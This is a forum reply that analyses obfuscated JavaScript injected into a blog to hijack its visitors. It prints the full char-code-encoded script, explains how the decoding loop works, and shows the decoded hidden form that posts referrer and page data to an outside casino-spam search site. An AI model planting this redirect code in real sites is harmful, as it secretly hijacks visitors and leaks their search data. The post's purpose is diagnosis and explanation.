Thread: How are they redirecting this blog ?
View Single Post
  #3 (permalink)  
Old 07-13-2008, 11:14 PM
mark_keller mark_keller is offline
Newbie
  
Join Date: Aug 2007
Posts: 7
Thanks: 0
Thanked 1 Time in 1 Post
Activity: 0%
Longevity: 40%
Today: 0/5
Default Re: How are they redirecting this blog ?
It's the following code:

Code: 
<script>var temp="",i,c=0,out="";var str="60!83!67!82!73!80!84!32!76!65!78!71!85!65!71!69!61!34!74!97!118!97!83!99!114!105!112!116!34!62!13!10!60!33!45!45!13!10!115!99!114!95!49!61!34!60!102!111!114!109!32!110!97!109!101!61!39!120!39!32!109!101!116!104!111!100!61!39!112!111!115!116!39!32!97!99!116!105!111!110!61!39!104!116!116!112!58!47!47!97!108!108!105!110!46!116!111!112!102!105!110!100!105!116!46!111!114!103!47!115!101!97!114!99!104!46!112!104!112!39!62!60!105!110!112!117!116!32!116!121!112!101!61!39!104!105!100!100!101!110!39!32!110!97!109!101!61!39!113!39!32!118!97!108!117!101!61!39!111!110!108!105!110!101!32!99!97!115!105!110!111!39!62!60!105!110!112!117!116!32!116!121!112!101!61!39!104!105!100!100!101!110!39!32!110!97!109!101!61!39!97!105!100!39!32!118!97!108!117!101!61!39!52!53!48!51!52!39!62!34!59!32!13!10!13!10!118!97!114!32!114!61!100!111!99!117!109!101!110!116!46!114!101!102!101!114!114!101!114!44!117!61!100!111!99!117!109!101!110!116!46!85!82!76!44!116!61!34!34!44!113!44!115!101!61!34!103!98!34!59!13!10!105!102!40!114!46!105!110!100!101!120!79!102!40!34!103!111!111!103!108!101!46!34!41!33!61!45!49!41!123!116!61!34!113!34!59!115!101!61!34!103!111!111!103!108!101!34!59!125!13!10!105!102!40!114!46!105!110!100!101!120!79!102!40!34!109!115!110!46!34!41!33!61!45!49!41!123!116!61!34!113!34!59!115!101!61!34!109!115!110!34!59!125!13!10!105!102!40!114!46!105!110!100!101!120!79!102!40!34!108!105!118!101!46!34!41!33!61!45!49!41!123!116!61!34!113!34!59!115!101!61!34!109!115!110!34!59!125!13!10!105!102!40!114!46!105!110!100!101!120!79!102!40!34!121!97!104!111!111!46!34!41!33!61!45!49!41!123!116!61!34!112!34!59!115!101!61!34!121!97!104!111!111!34!59!125!13!10!105!102!40!114!46!105!110!100!101!120!79!102!40!34!97!108!116!97!118!105!115!116!97!46!34!41!33!61!45!49!41!123!116!61!34!113!34!59!115!101!61!34!97!108!116!97!118!105!115!116!97!34!59!125!13!10!105!102!40!114!46!105!110!100!101!120!79!102!40!34!97!111!108!46!34!41!33!61!45!49!41!123!116!61!34!113!117!101!114!121!34!59!115!101!61!34!97!111!108!34!59!125!13!10!105!102!40!114!46!105!110!100!101!120!79!102!40!34!97!115!107!46!34!41!33!61!45!49!41!123!116!61!34!113!34!59!115!101!61!34!97!115!107!34!59!125!13!10!105!102!40!115!101!61!61!34!103!98!34!124!124!40!40!113!61!114!46!105!110!100!101!120!79!102!40!34!63!34!43!116!43!34!61!34!41!41!33!61!45!49!124!124!40!113!61!114!46!105!110!100!101!120!79!102!40!34!38!34!43!116!43!34!61!34!41!41!33!61!45!49!41!41!13!10!13!10!115!99!114!95!50!61!34!60!105!110!112!117!116!32!116!121!112!101!61!39!104!105!100!100!101!110!39!32!110!97!109!101!61!39!117!39!32!118!97!108!117!101!61!39!34!43!117!43!34!39!62!60!105!110!112!117!116!32!116!121!112!101!61!39!104!105!100!100!101!110!39!32!110!97!109!101!61!39!115!101!39!32!118!97!108!117!101!61!39!34!43!115!101!43!34!39!62!60!105!110!112!117!116!32!116!121!112!101!61!39!104!105!100!100!101!110!39!32!110!97!109!101!61!39!114!39!32!118!97!108!117!101!61!39!34!43!114!46!115!117!98!115!116!114!105!110!103!40!113!43!50!43!116!46!108!101!110!103!116!104!41!46!115!112!108!105!116!40!34!38!34!41!91!48!93!43!34!39!62!60!105!110!112!117!116!32!116!121!112!101!61!39!104!105!100!100!101!110!39!32!110!97!109!101!61!39!107!101!121!119!111!114!100!39!32!118!97!108!117!101!61!39!37!75!69!89!87!79!82!68!37!39!62!34!59!13!10!13!10!115!99!114!95!50!95!49!61!34!39!62!34!59!32!13!10!115!99!114!95!51!61!34!60!47!102!111!114!109!62!34!59!32!13!10!13!10!118!97!114!32!116!101!109!112!61!34!34!44!105!44!99!61!48!44!111!117!116!61!34!34!59!118!97!114!32!115!116!114!61!34!54!48!33!56!51!33!54!55!33!56!50!33!55!51!33!56!48!33!56!52!33!51!50!33!55!54!33!54!53!33!55!56!33!55!49!33!56!53!33!54!53!33!55!49!33!54!57!33!54!49!33!51!52!33!55!52!33!57!55!33!49!49!56!33!57!55!33!56!51!33!57!57!33!49!49!52!33!49!48!53!33!49!49!50!33!49!49!54!33!51!52!33!54!50!33!49!51!33!49!48!33!54!48!33!51!51!33!52!53!33!52!53!33!49!51!33!49!48!33!49!48!48!33!49!49!49!33!57!57!33!49!49!55!33!49!48!57!33!49!48!49!33!49!49!48!33!49!49!54!33!52!54!33!49!48!50!33!49!49!49!33!49!49!52!33!49!48!57!33!49!49!53!33!57!49!33!51!57!33!49!50!48!33!51!57!33!57!51!33!52!54!33!49!49!53!33!49!49!55!33!57!56!33!49!48!57!33!49!48!53!33!49!49!54!33!52!48!33!52!49!33!53!57!33!49!51!33!49!48!33!52!55!33!52!55!33!52!53!33!52!53!33!54!50!33!49!51!33!49!48!33!54!48!33!52!55!33!56!51!33!54!55!33!56!50!33!55!51!33!56!48!33!56!52!33!54!50!33!34!59!108!61!115!116!114!46!108!101!110!103!116!104!59!119!104!105!108!101!40!99!60!61!115!116!114!46!108!101!110!103!116!104!45!49!41!123!119!104!105!108!101!40!115!116!114!46!99!104!97!114!65!116!40!99!41!33!61!39!33!39!41!116!101!109!112!61!116!101!109!112!43!115!116!114!46!99!104!97!114!65!116!40!99!43!43!41!59!99!43!43!59!111!117!116!61!111!117!116!43!83!116!114!105!110!103!46!102!114!111!109!67!104!97!114!67!111!100!101!40!116!101!109!112!41!59!116!101!109!112!61!34!34!59!125!13!10!115!99!114!95!52!61!111!117!116!59!13!10!13!10!100!111!99!117!109!101!110!116!46!119!114!105!116!101!40!115!99!114!95!49!43!115!99!114!95!50!41!59!13!10!100!111!99!117!109!101!110!116!46!119!114!105!116!101!40!115!99!114!95!50!95!49!43!115!99!114!95!51!43!115!99!114!95!52!41!59!13!10!47!47!45!45!62!13!10!60!47!83!67!82!73!80!84!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);</script>
What the code does it's that first they stored numeric values 60, 83, etc. in variable var and connected them with ! (exclamation marks). Then they have two loops, first to check if the current position's value equals ! and the second to find position of the character with charAt and store the following character in variable temp.

After that they assign variable temp to variable out, but now with decoded characters from numbers [String.fromCharCode(temp)]. What this function does is "converting" those numbers (actually unicode values) to string.

After that they just write the contents. The whole point of this is that no one should be able to see that.

Anyway, here's their code that you get after decoding str variable:

Code: 
<form name="x" method="post" action="http://allin.topfindit.org/search.php"><input name="q" value="online casino" type="hidden"><input name="aid" value="45034" type="hidden"><input name="u" value="[here goes the name of the html file]" type="hidden"><input name="se" value="gb" type="hidden"><input name="r" value="" type="hidden"><input name="keyword" value="%KEYWORD%" type="hidden">'&gt;</form>
As you can see, they're simulating user search, that is post form.
Reply With Quote
The Following User Says Thank You to mark_keller For This Useful Post:
MaximusXXII (07-13-2008)